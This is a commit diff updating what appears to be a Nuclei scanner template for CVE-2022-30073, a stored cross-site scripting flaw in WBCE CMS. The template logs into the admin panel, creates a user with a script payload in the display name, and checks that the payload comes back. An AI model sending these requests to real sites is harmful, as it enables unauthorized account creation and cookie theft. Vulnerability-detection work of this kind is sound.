Update CVE-2022-30073.yaml

2022-07-11 21:14:02 +05:30 · 2022-07-11 21:14:02 +05:30 · 631a204046
parent 05238263b9
commit 631a204046
1 changed files with 10 additions and 19 deletions
--- a/cves/2022/CVE-2022-30073.yaml
+++ b/cves/2022/CVE-2022-30073.yaml
@ -11,47 +11,38 @@ info:
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-30073
  metadata:
    verified: true
-  tags: wbcecms,xss
+  tags: cve,cve2022,wbcecms,xss,authenticated

 requests:
  - raw: 
      - |
-        POST /wbcecms/wbce/admin/login/index.php HTTP/1.1
+        POST /wbce/admin/login/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded
       
-        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh=admin&password_axh5kevh=Admin@123&submit=Login
+        url=&username_fieldname=username_axh5kevh&password_fieldname=password_axh5kevh&username_axh5kevh={{username}}&password_axh5kevh={{password}}&submit=Login

      - |
-        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
+        GET /wbce/admin/users/index.php HTTP/1.1
        Host: {{Hostname}}    
        Content-Type: application/x-www-form-urlencoded 

      - |
-        POST /wbcecms/wbce/admin/users/index.php HTTP/1.1
+        POST /wbce/admin/users/index.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        formtoken={{formtoken}}&user_id=&username_fieldname=username_tep83j9z&username_tep83j9z=temp123&password=tempbitch&password2=tempbitch&display_name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&email=temp121%40abc.com&home_folder=&groups%5B%5D=1&active%5B%5D=1&submit=

-      - |
-        GET /wbcecms/wbce/admin/users/index.php HTTP/1.1
-        Host: {{Hostname}}
-        Content-Type: application/x-www-form-urlencoded
-
    cookie-reuse: true
    extractors:
-      - type: regex  # type of extractor
-        name: formtoken # defining the variable name
-        part: body # part of response to look for
-        # group defines the matching group being used. 
-        # In GO the "match" is the full array of all matches and submatches 
-        # match[0] is the full match
-        # match[n] is the submatches. Most often we'd want match[1] as depicted below
+      - type: regex
+        name: formtoken
+        part: body
+        internal: true
        group: 1
        regex:
          - '<input\stype="hidden"\sname="formtoken"\svalue="([^"]*)"\s/>'
-        internal: true


    matchers-condition: and
@ -59,7 +50,7 @@ requests:
      - type: word
        part: body
        words:
-          - "<script>alert(document.cookie)</script>"
+          - 'value="<script>alert(document.cookie)</script>" class="wdt250'

      - type: word
        part: header